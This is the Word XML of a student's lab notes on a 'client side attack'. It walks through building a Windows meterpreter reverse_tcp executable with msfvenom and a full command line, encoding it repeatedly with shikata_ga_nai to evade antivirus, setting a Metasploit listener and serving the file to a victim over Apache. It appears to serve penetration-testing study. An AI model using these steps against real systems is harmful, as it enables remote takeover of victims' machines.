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D23D4" w14:textId="5BC16E4F" w:rsidR="000C26F8" w:rsidRDefault="000C26F8" w:rsidP="000C26F8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ARYAMAN MISHRA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D65698" w14:textId="16368669" w:rsidR="000C26F8" w:rsidRDefault="000C26F8" w:rsidP="000C26F8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19BCE1027</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595587DF" w14:textId="11544B38" w:rsidR="000C26F8" w:rsidRPr="000C26F8" w:rsidRDefault="000C26F8" w:rsidP="000C26F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C26F8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Client Side attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A66EE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If system is somewhere in the network try create malware and send to victim as he processes it we get access to victim’s system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B8809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Malware -&gt;in a file malware can be injected and sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787E975C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MSFVnom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B819950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Payload is virus file created using MSFVENOM (msfpayload + msfencode).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E35354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It can create payloads and encodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D6C59F" w14:textId="362F241C" w:rsidR="00BC3404" w:rsidRPr="000C26F8" w:rsidRDefault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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78DEEFE1" wp14:editId="6EE14FA7">
            <wp:extent cx="5731510" cy="2369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6642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Lists displays different types of payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4503C255" w14:textId="77777777" w:rsidR="008E0083" w:rsidRDefault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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ACCE092" wp14:editId="0174160B">
            <wp:extent cx="4200525" cy="339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3600" cy="341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136A" w14:textId="3486EDB1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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Reverse connection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744CAFDB" w14:textId="77777777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When encode again &amp; again more chances of bypassing antivirus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D036968" w14:textId="77777777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Drawback – more iteration malware size becomes more (less likely to be downloaded).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EF9691" w14:textId="77777777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-f specifies format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70702612" w14:textId="77777777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-o for output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197161E0" w14:textId="77777777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We are trying to create a malware file in the root we can mention any location in exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D4D2D3" w14:textId="77777777" w:rsidR="008E0083" w:rsidRDefault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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56C06121" wp14:editId="4C748B06">
            <wp:extent cx="5731510" cy="1743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E423" w14:textId="77777777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From host malware to victim when downloaded we will be able to connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4644D361" w14:textId="77777777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Lhost listener host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596E00B6" w14:textId="77777777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Lpost listener post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3A7D1E" w14:textId="3714CCD6" w:rsidR="008E0083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Windows/meterpreter/Reverse_tcp- payload from the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34030722" w14:textId="73357193" w:rsidR="008E0083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Windows/64/meterpreter/Reverse_tcp for 64 system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B35863E" w14:textId="7236B042" w:rsidR="008E0083" w:rsidRPr="000C26F8" w:rsidRDefault="008E0083" w:rsidP="008E0083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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6995B576" wp14:editId="58DF1943">
            <wp:extent cx="3459480" cy="363923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8932" cy="36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1E41" w14:textId="49B80C9E" w:rsidR="000C26F8" w:rsidRDefault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2AAFDF" wp14:editId="0C47EE68">
            <wp:extent cx="4617720" cy="910319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745" cy="910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6F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8485845" wp14:editId="470022E5">
            <wp:extent cx="4366326" cy="8658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224" cy="86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75E3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lastRenderedPageBreak/>
        <w:t>Encoder- used to bypass any antivirus present in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276449E0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To attack a windows machine this command we create listener host malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D72E9FF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 xml:space="preserve">Ip address used here is kali ip </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2D2E05" w14:textId="77777777" w:rsidR="000C26F8" w:rsidRDefault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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AA93B8B" wp14:editId="23B5BEFB">
            <wp:extent cx="5731510" cy="937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482B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 xml:space="preserve">Command to create malware </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1C3EA3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sudo msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST=192.168.42.132 LPORT=4545 -e x86/shikata_ga_nai -i 5 -f exe -o /home/kali/malware.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399BC2B7" w14:textId="77777777" w:rsidR="000C26F8" w:rsidRPr="000C26F8" w:rsidRDefault="000C26F8" w:rsidP="000C26F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C26F8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set the listener process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2789B59B" w14:textId="77777777" w:rsidR="000C26F8" w:rsidRPr="000C26F8" w:rsidRDefault="000C26F8" w:rsidP="000C26F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6908CDF4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How will our system get access – for that we need to set how to set listener process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D1F0E5" w14:textId="59119209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Manual method to set listener</w:t>
      </w:r>
      <w:r w:rsidRPr="000C26F8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="121C42BB" wp14:editId="3B164D21">
            <wp:extent cx="6391629" cy="4648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1010" cy="4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4FF5" w14:textId="7738DF56" w:rsidR="000C26F8" w:rsidRPr="000C26F8" w:rsidRDefault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B6643D" wp14:editId="03B90050">
            <wp:extent cx="6564674" cy="35623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1184" cy="35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6F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E731A1E" wp14:editId="0C363510">
            <wp:extent cx="7508113" cy="3762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14552" cy="37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6F4A" w14:textId="77777777" w:rsidR="008E0083" w:rsidRDefault="008E0083" w:rsidP="000C26F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61E80C4C" w14:textId="77777777" w:rsidR="008E0083" w:rsidRDefault="008E0083" w:rsidP="000C26F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31551373" w14:textId="77777777" w:rsidR="008E0083" w:rsidRDefault="008E0083" w:rsidP="000C26F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="214B6A5F" w14:textId="77777777" w:rsidR="008E0083" w:rsidRDefault="008E0083" w:rsidP="000C26F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08573B4D" w14:textId="77777777" w:rsidR="008E0083" w:rsidRDefault="008E0083" w:rsidP="000C26F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="736C5F1D" w14:textId="1A4C9E0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lastRenderedPageBreak/>
        <w:t>Give same lport which we used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7777BB98" w14:textId="74EE2953" w:rsidR="000C26F8" w:rsidRPr="000C26F8" w:rsidRDefault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3B86094" wp14:editId="5F35B942">
            <wp:extent cx="5731510" cy="31724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C029" w14:textId="77777777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Now after exploit command listener is set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E7855" w14:textId="5416245F" w:rsidR="000C26F8" w:rsidRPr="008E0083" w:rsidRDefault="000C26F8" w:rsidP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9560D87" wp14:editId="43ABC8CB">
            <wp:extent cx="5731510" cy="5746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46E" w14:textId="76796541" w:rsidR="000C26F8" w:rsidRPr="000C26F8" w:rsidRDefault="000C26F8" w:rsidP="000C26F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C26F8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Send it through apache server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302419B4" w14:textId="1EBEA008" w:rsidR="000C26F8" w:rsidRPr="000C26F8" w:rsidRDefault="000C26F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C26F8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D1A523B" wp14:editId="00897796">
            <wp:extent cx="5731510" cy="18472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6F8" w:rsidRPr="000C2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38"/>
    <w:rsid w:val="000C26F8"/>
    <w:rsid w:val="00670E38"/>
    <w:rsid w:val="008E0083"/>
    <w:rsid w:val="00BC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EF6AA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9059FF60-E388-48EC-A470-2060EAC80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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-10T14:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-10T14:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>